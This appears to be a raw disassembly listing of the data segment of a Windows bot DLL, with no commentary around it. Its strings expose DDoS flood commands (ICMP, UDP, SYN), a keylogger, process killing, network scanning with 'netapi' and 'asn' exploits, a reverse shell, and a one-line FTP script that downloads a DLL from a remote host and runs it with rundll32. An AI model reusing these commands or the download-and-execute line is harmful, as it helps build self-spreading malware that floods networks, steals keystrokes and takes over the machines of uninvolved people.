aIcmp db 'icmp',0 ; DATA XREF: sub_10007424+107F�o
align 4
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_10007424+10FB�o
align 4
; char aIcmpFloodingSF[]
aIcmpFloodingSF db 'ICMP-Flooding %s for %s seconds.',0 ; DATA XREF: sub_10007424+1195�o
align 4
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_10007424+11B9�o
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_10007424+1255�o
align 4
; char aUdpFloodingSOn[]
aUdpFloodingSOn db 'UDP-Flooding %s on port %s for %s seconds.',0
; DATA XREF: sub_10007424+12FA�o
align 4
; char aSyn[]
aSyn db 'syn',0 ; DATA XREF: sub_10007424+131E�o
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_10007424+13BA�o
align 4
; char aSSynFloodingSO[]
aSSynFloodingSO db '%s SYN-Flooding %s on port %s for %s seconds.',0
; DATA XREF: sub_10007424+143C�o
align 4
; char aDdosstop[]
aDdosstop db 'ddosstop',0 ; DATA XREF: sub_10007424+1460�o
align 4
; char aIcmpflood_0[]
aIcmpflood_0 db 'icmpflood',0 ; DATA XREF: sub_10007424+1472�o
align 10h
; char aUdpflood_0[]
aUdpflood_0 db 'udpflood',0 ; DATA XREF: sub_10007424+147F�o
align 4
; char aSynflood_0[]
aSynflood_0 db 'synflood',0 ; DATA XREF: sub_10007424+148C�o
align 4
; char aDdosFloodHasSt[]
aDdosFloodHasSt db 'DDOS FLOOD HAS STOPPED',0 ; DATA XREF: sub_10007424+1499�o
align 10h
; char aUpdate[]
aUpdate db 'update',0 ; DATA XREF: sub_10007424+14BD�o
align 4
aExe db 'exe',0 ; DATA XREF: sub_10007424+1579�o
aDll db 'dll',0 ; DATA XREF: sub_10007424:loc_100089A9�o
; char aSS_S[]
aSS_S db '%s\%s.%s',0 ; DATA XREF: sub_10007424+15A4�o
align 4
; char aUpdatingUpdate[]
aUpdatingUpdate db '{UPDATING}: Updated file... [FILE: %s]',0
; DATA XREF: sub_10007424+15DA�o
align 4
; char aUpdate_0[]
aUpdate_0 db 'update',0 ; DATA XREF: sub_10007424+15F5�o
align 4
; char aHttpd[]
aHttpd db '!httpd',0 ; DATA XREF: sub_10007424+1691�o
align 4
; char aExploitedHttpS[]
aExploitedHttpS db '{EXPLOITED-HTTP}: Started on %s:83...',0Dh,0Ah,0
; DATA XREF: sub_10007424+16A8�o
; char aTl[]
aTl db 'tl',0 ; DATA XREF: sub_10007424+16CC�o
align 10h
; char aTk[]
aTk db 'tk',0 ; DATA XREF: sub_10007424+1704�o
align 4
; char aThreadsKilledT[]
aThreadsKilledT db '{THREADS}: Killed thread %s...',0 ; DATA XREF: sub_10007424+1746�o
align 4
; char aKpid[]
aKpid db 'kpid',0 ; DATA XREF: sub_10007424+176A�o
align 4
; char aThreadsKille_0[]
aThreadsKille_0 db '{THREADS}: Killed thread %s...',0 ; DATA XREF: sub_10007424+17B6�o
align 4
; char aKat[]
aKat db 'kat',0 ; DATA XREF: sub_10007424+17DA�o
; char aThreadsKilledA[]
aThreadsKilledA db '{THREADS}: Killed all threads...',0 ; DATA XREF: sub_10007424+17FC�o
align 4
; char aPslist[]
aPslist db 'pslist',0 ; DATA XREF: sub_10007424+1820�o
align 4
; char aPskill[]
aPskill db 'pskill',0 ; DATA XREF: sub_10007424+185D�o
align 4
; char aPskillpid[]
aPskillpid db 'pskillpid',0 ; DATA XREF: sub_10007424+18A9�o
align 10h
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_10007424+18FA�o
align 4
; char aHttpserverSS__[]
aHttpserverSS__ db '{HTTPSERVER}: %s:%s...',0Dh,0Ah,0 ; DATA XREF: sub_10007424+197C�o
align 4
; char aHttpd_0[]
aHttpd_0 db 'httpd',0 ; DATA XREF: sub_10007424+19A2�o
align 10h
; char aUinfo[]
aUinfo db 'uinfo',0 ; DATA XREF: sub_10007424+1A35�o
align 4
aPc db 'PC',0 ; DATA XREF: sub_10007424+1A4B�o
align 4
aPc_0 db 'PC',0 ; DATA XREF: sub_10007424+1A91�o
align 10h
aPc_1 db 'PC',0 ; DATA XREF: sub_10007424+1B26�o
align 4
aWindows95 db 'WINDOWS 95',0 ; DATA XREF: sub_10007424+1B7C�o
align 10h
aWindowsNt db 'WINDOWS NT',0 ; DATA XREF: sub_10007424+1B8F�o
align 4
aWindows98 db 'WINDOWS 98',0 ; DATA XREF: sub_10007424+1BB0�o
align 4
aWindowsMe db 'WINDOWS ME',0 ; DATA XREF: sub_10007424+1BD1�o
align 4
aWindows2k db 'WINDOWS 2K',0 ; DATA XREF: sub_10007424+1BEF�o
align 10h
aWindowsXp db 'WINDOWS XP',0 ; DATA XREF: sub_10007424+1C0D�o
align 4
aWindows2k3 db 'WINDOWS 2K3',0 ; DATA XREF: sub_10007424+1C2B�o
aUnknown db 'UNKNOWN',0 ; DATA XREF: sub_10007424:loc_1000905B�o
; char aUserinfoCountr[]
aUserinfoCountr db '{USERINFO}: Country %s operating system %s...',0
; DATA XREF: sub_10007424+1C75�o
align 10h
; char aScan[]
aScan db 'scan',0 ; DATA XREF: sub_10007424+1C99�o
align 4
; char aAsn[]
aAsn db 'asn',0 ; DATA XREF: sub_10007424+1CE4�o
; char aAsn_0[]
aAsn_0 db 'asn',0 ; DATA XREF: sub_10007424+1D17�o
; char aD_D_D_D_1[]
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10007424+1D48�o
; char aScanningD_x_x_[]
aScanningD_x_x_ db '{SCANNING}: %d.x.x.x - %d.%d.x.x...',0 ; DATA XREF: sub_10007424+1D70�o
; char aNetapi[]
aNetapi db 'netapi',0 ; DATA XREF: sub_10007424+1D9B�o
align 4
; char aNetapi_0[]
aNetapi_0 db 'netapi',0 ; DATA XREF: sub_10007424+1DCE�o
align 10h
; char aD_D_D_D_2[]
aD_D_D_D_2 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10007424+1DFF�o
; char aScanningD_x__0[]
aScanningD_x__0 db '{SCANNING}: %d.x.x.x - %d.%d.x.x...',0 ; DATA XREF: sub_10007424+1E27�o
; char aScanningFailed[]
aScanningFailed db '{SCANNING}: Failed...',0 ; DATA XREF: sub_10007424+1E6F�o
align 4
; char aD_D_D_D_3[]
aD_D_D_D_3 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10007424+1F1D�o
; char aD_D_D_D_4[]
aD_D_D_D_4 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10007424+1F93�o
; char aD_x_x_x[]
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_10007424+1FBD�o
align 4
; char aD_D_x_x[]
aD_D_x_x db '%d.%d.x.x',0 ; DATA XREF: sub_10007424+1FF7�o
align 4
; char aD_D_D_x[]
aD_D_D_x db '%d.%d.%d.x',0 ; DATA XREF: sub_10007424+2034�o
align 4
; char aD_D_x_x_0[]
aD_D_x_x_0 db '%d.%d.x.x',0 ; DATA XREF: sub_10007424+205B�o
align 10h
; char aScan_0[]
aScan_0 db 'scan',0 ; DATA XREF: sub_10007424+208C�o
align 4
; char aKeylog[]
aKeylog db 'keylog',0 ; DATA XREF: sub_10007424+2142�o
align 10h
asc_100127A0 db 0Dh,0Ah,0 ; DATA XREF: sub_10007424+21FC�o
align 4
; char aKeylogS[]
aKeylogS db '{KEYLOG}:%s',0Dh,0Ah,0 ; DATA XREF: sub_10007424+2201�o
align 4
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_10007424+2227�o
align 10h
; char aScan_1[]
aScan_1 db 'scan',0 ; DATA XREF: sub_10007424+2239�o
align 4
; char aScanstopStoppe[]
aScanstopStoppe db '{SCANSTOP}: Stopped scanning... :%d: Roots...',0
; DATA XREF: sub_10007424+224D�o
align 4
; char aEip[]
aEip db '!eip',0 ; DATA XREF: sub_10007424+2271�o
align 10h
; char PrefixString[]
PrefixString db 'Temp',0 ; DATA XREF: sub_10007424+231F�o
align 4
aHttpWww_what_0 db 'http://www.whatismyip.org',0
align 4
; char aExternalIpS___[]
aExternalIpS___ db '{EXTERNAL-IP} %s...',0 ; DATA XREF: sub_10007424+238B�o
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_10007424+23AC�o
align 4
; char aScanstatsExplo[]
aScanstatsExplo db '{SCANSTATS}: Exploits %d...',0 ; DATA XREF: sub_10007424+23ED�o
; char aSD[]
aSD db '%s (%d)',0 ; DATA XREF: sub_1000998F+D5�o
; char aD_D_D_D_5[]
aD_D_D_D_5 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10009B22+32�o
; char aD_D_D_D_6[]
aD_D_D_D_6 db '%d.%d.%d.%d',0 ; DATA XREF: sub_10009B22+B4�o
; char aFtpd[]
aFtpd db 'ftpd',0 ; DATA XREF: sub_10009C30+6�o
align 4
; char aFtpd_0[]
aFtpd_0 db 'ftpd',0 ; DATA XREF: sub_10009C30+4F�o
align 10h
; char aS_dll_7[]
aS_dll_7 db '%s.dll',0 ; DATA XREF: sub_10009CEB+BF�o
align 4
; char aEchoOpenSHuXEc[]
aEchoOpenSHuXEc db 'echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo get %s>>x&ec'
; DATA XREF: sub_10009CEB+F2�o
db 'ho bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0Dh,0Ah,0
align 4
; char aMsdtc[]
aMsdtc db 'msdtc',0 ; DATA XREF: sub_10009EF0+74�o
align 4
; char aRshell[]
aRshell db 'rshell',0 ; DATA XREF: sub_10009EF0+89�o
align 4
; char aRshell_0[]
aRshell_0 db 'rshell',0 ; DATA XREF: sub_10009EF0+D4�o
align 4
; char aAsn_1[]
aAsn_1 db 'asn',0 ; DATA XREF: sub_1000A1A9+24F�o
; char aNetapi_1[]
aNetapi_1 db 'netapi',0 ; DATA XREF: sub_1000A1A9:loc_1000A447�o
align 4
; char aHuAttemptingTo[]
aHuAttemptingTo db '%hu | Attempting to exploit %s',0 ; DATA XREF: sub_1000A1A9+32A�o
align 4
; char aGotReverseShel[]
aGotReverseShel db '[+] Got reverse shell connection from %s',0
; DATA XREF: sub_1000A50C+120�o
align 4
; char aS_dll_8[]
aS_dll_8 db '%s.dll',0 ; DATA XREF: sub_1000A50C+138�o
align 4
; char aEchoOpenSHuX_0[]
aEchoOpenSHuX_0 db 'echo open %s %hu>x&echo user x x>>x&echo bin>>x&echo get %s>>x&ec'
; DATA XREF: sub_1000A50C+16C�o
db 'ho bye>>x&ftp.exe -n -s:x&del x&rundll32.exe %s,start',0Dh,0Ah,0
align 4
; char aD_SS[]
aD_SS db '%d. %s (%s)',0 ; DATA XREF: sub_1000A858+56�o
; char aD_D_D_D_7[]
aD_D_D_D_7 db '%d.%d.%d.%d',0 ; DATA XREF: sub_1000B122+16�o
; char aD_D_D_D_8[]
aD_D_D_D_8 db '%d.%d.%d.%d',0 ; DATA XREF: sub_1000B122+76�o
; char aD_D_D_D_9[]
aD_D_D_D_9 db '%d.%d.%d.%d',0 ; DATA XREF: sub_1000B122+A8�o
align 10h
byte_10012A40 db 0 ; DATA XREF: sub_100020D3+3�o
; sub_100020F5+3�o
byte_10012A41 db 3 dup(0) ; DATA XREF: sub_10002092+3�o
; sub_100020B4+3�o
align 8
dword_10012A48 dd 2 dup(0) ; DATA XREF: sub_100019DF+11F�o
dword_10012A50 dd 0 ; DATA XREF: sub_1000127E+18�o
byte_10012A54 db 0 ; DATA XREF: sub_10003D22+3�o
; sub_10003D44+3�o
byte_10012A55 db 3 dup(0) ; DATA XREF: sub_10003CE1+3�o
; sub_10003D03+3�o
dd 0
dword_10012A5C dd 0 ; DATA XREF: sub_100024A5+3DD�r
; sub_100024A5+3E5�w ...
dword_10012A60 dd 0 ; DATA XREF: sub_1000329E+19�o
byte_10012A64 db 0 ; DATA XREF: sub_100041A3+3�o
; sub_100041C5+3�o
byte_10012A65 db 3 dup(0) ; DATA XREF: sub_10004162+3�o
; sub_10004184+3�o
align 10h
; char byte_10012A70[]
byte_10012A70 db 80h dup(0) ; DATA XREF: start+15C�o
; sub_10004BB5+15�o ...
; char byte_10012AF0[]
byte_10012AF0 db 20h dup(0) ; DATA XREF: sub_10007424+180�o
; sub_10007424+18E�o ...
; char byte_10012B10[]
byte_10012B10 db 20h dup(0) ; DATA XREF: sub_10007398+16�o
; sub_10007424+373�o ...
; char byte_10012B30[]
byte_10012B30 db 10h dup(0) ; DATA XREF: sub_10007398+37�o
; sub_10007398+58�o
; char byte_10012B40[]
byte_10012B40 db 80h dup(0) ; DATA XREF: sub_10007398+7C�o
; SOCKET s
s dd 0 ; DATA XREF: start+1D5�r
; sub_10004C83+15�r ...
dword_10012BC4 dd 20h dup(0) ; DATA XREF: sub_1000504C+9F�o
byte_10012C44 db 0 ; DATA XREF: sub_1000504C+4B�o
; sub_10007005+266�r ...
align 4
dd 1Fh dup(0)
; char ExistingFileName[]
ExistingFileName db 100h dup(0) ; DATA XREF: DllMain(x,x,x)+15�o
; sub_10004CE4+41�o ...
byte_10012DC4 db 0 ; DATA XREF: sub_1000534D+3�o
; sub_1000536F+3�o
byte_10012DC5 db 3 dup(0) ; DATA XREF: sub_1000530C+3�o
; sub_1000532E+3�o
; char Dest[]
Dest db 10h dup(0) ; DATA XREF: sub_10001EBF+9B�o
; sub_100024A5+3B8�o ...
byte_10012DD8 db 0 ; DATA XREF: sub_1000A752+28�r
; sub_1000A752+42�o ...
align 4
dd 0Fh dup(0)
dword_10012E18 dd 20h dup(0) ; DATA XREF: sub_1000A752+64�o
; sub_1000A858+3C�o ...
byte_10012E98 db 0 ; DATA XREF: sub_10007424+20C0�w
; sub_1000A8D0+67�r ...
byte_10012E99 db 0 ; DATA XREF: sub_1000A8D0+93�r
; sub_1000A8D0+A6�w ...
align 10h
dword_10012EA0 dd 0 ; DATA XREF: sub_10007424+ED5�w
; sub_10007424+EE7�r ...
dd 57h dup(0)
dd 6576h dup(?)
; char byte_1002C5D8[]
byte_1002C5D8 db 10h dup(?) ; DATA XREF: start+148�o
; sub_10004BB5+1A�o ...
dword_1002C5E8 dd 20h dup(?) ; DATA XREF: sub_10004CE4+1B�o
; sub_10004DB1+1B�o ...
; char Str[]
Str db 80h dup(?) ; DATA XREF: sub_1000504C+2F�o
; sub_10007005+1D9�o
; char Name[]
Name db 80h dup(?) ; DATA XREF: start+111�o
; sub_1000504C+13�o ...
dword_1002C768 dd 20h dup(?) ; DATA XREF: sub_1000504C+83�o
; sub_10007424+1A0�o ...
dword_1002C7E8 dd 20h dup(?) ; DATA XREF: sub_1000504C+BB�o
; sub_10005C3D+B6F�o ...
; char byte_1002C868[]
byte_1002C868 db 80h dup(?) ; DATA XREF: sub_100024A5+358�o
; sub_100024A5+7BA�o ...
byte_1002C8E8 db ? ; DATA XREF: sub_1000504C+123�o
; sub_1000504C+13A�w ...
align 4
dd 200h dup(?)
; char dword_1002D0EC[]
dword_1002D0EC dd ? ; DATA XREF: sub_10005C3D+B4A�r
; sub_10005C3D+B52�w ...
dd ?
db ?
byte_1002D0F5 db ? ; DATA XREF: sub_10005C3D+B59�r
; sub_10007424+2078�w
byte_1002D0F6 db ? ; DATA XREF: sub_10007424+1CC3�r
; sub_10007424:loc_100090F6�w ...
byte_1002D0F7 db ? ; DATA XREF: sub_1000A8D0+AD�w
; sub_1000AA09+54�w ...
byte_1002D0F8 db ? ; DATA XREF: sub_10005864+3�o
; sub_10005886+3�o
byte_1002D0F9 db 3 dup(?) ; DATA XREF: sub_10005823+3�o
; sub_10005845+3�o
align 10h
byte_1002D100 db ? ; DATA XREF: sub_10005A3C+3�o
; sub_10005A5E+3�o
byte_1002D101 db 3 dup(?) ; DATA XREF: sub_100059FB+3�o
; sub_10005A1D+3�o
align 8
; u_short hostshort
hostshort dw ? ; DATA XREF: sub_10001EBF+93�r
; sub_100024A5+3B0�r ...
byte_1002D10A db ? ; DATA XREF: sub_100068E3+3�o
; sub_10006905+3�o
byte_1002D10B db ? ; DATA XREF: sub_100068A2+3�o
; sub_100068C4+3�o
; SOCKET dword_1002D10C
dword_1002D10C dd ? ; DATA XREF: sub_10005A70+12�w
; sub_10005A70+4F�r ...
dd ?
byte_1002D114 db ? ; DATA XREF: sub_10006970+3�o
; sub_10006992+3�o
byte_1002D115 db 3 dup(?) ; DATA XREF: sub_1000692F+3�o
; sub_10006951+3�o
dd ?
byte_1002D11C db ? ; DATA XREF: sub_10006F70+3�o
; sub_10006F92+3�o
byte_1002D11D db 3 dup(?) ; DATA XREF: sub_10006F2F+3�o
; sub_10006F51+3�o
dd ?
dword_1002D124 dd ? ; DATA XREF: sub_10007005+1A�o
; char dword_1002D128[]
dword_1002D128 dd ? ; DATA XREF: sub_10007424+1840�o
dword_1002D12C dd ? ; DATA XREF: sub_10007424:loc_10008CA5�o
dword_1002D130 dd ? ; DATA XREF: sub_10007424:loc_10008F54�o
byte_1002D134 db ? ; DATA XREF: sub_10009880+3�o
; sub_100098A2+3�o
byte_1002D135 db 3 dup(?) ; DATA XREF: sub_1000983F+3�o
; sub_10009861+3�o
dd ?
; u_short word_1002D13C
word_1002D13C dw ? ; DATA XREF: sub_10009E30+7E�r
; sub_10009EF0+18C�w ...
byte_1002D13E db ? ; DATA XREF: sub_10009AF0+3�o
; sub_10009B12+3�o
byte_1002D13F db ? ; DATA XREF: sub_10009AAF+3�o
; sub_10009AD1+3�o
; u_short Val
Val dw ? ; DATA XREF: sub_10009EF0+B0�w
; sub_10009EF0+C2�r ...
align 8
byte_1002D148 db ? ; DATA XREF: sub_1000A720+3�o
; sub_1000A742+3�o
byte_1002D149 db 3 dup(?) ; DATA XREF: sub_1000A6DF+3�o
; sub_1000A701+3�o
align 10h
byte_1002D150 db ? ; DATA XREF: sub_1000AC80+3�o
; sub_1000ACA2+3�o
byte_1002D151 db 3 dup(?) ; DATA XREF: sub_1000AC3F+3�o
; sub_1000AC61+3�o
align 8
byte_1002D158 db ? ; DATA XREF: sub_1000B0F0+3�o
; sub_1000B112+3�o
byte_1002D159 db 3 dup(?) ; DATA XREF: sub_1000B0AF+3�o
; sub_1000B0D1+3�o
align 10h
dword_1002D160 dd ? ; DATA XREF: _CRT_INIT(x,x,x)+8�r
; _CRT_INIT(x,x,x)+10�w ...
dword_1002D164 dd ? ; DATA XREF: _CRT_INIT(x,x,x)+21�w
dword_1002D168 dd ? ; DATA XREF: DllEntryPoint:loc_1000BB9F�r
; DllEntryPoint+82�r
dword_1002D16C dd ? ; DATA XREF: __onexit:loc_1000B981�o
; _CRT_INIT(x,x,x)+54�w ...
; void *Memory
Memory dd ? ; DATA XREF: __onexit�r __onexit+1A�o ...
_data ends
end DllEntryPoint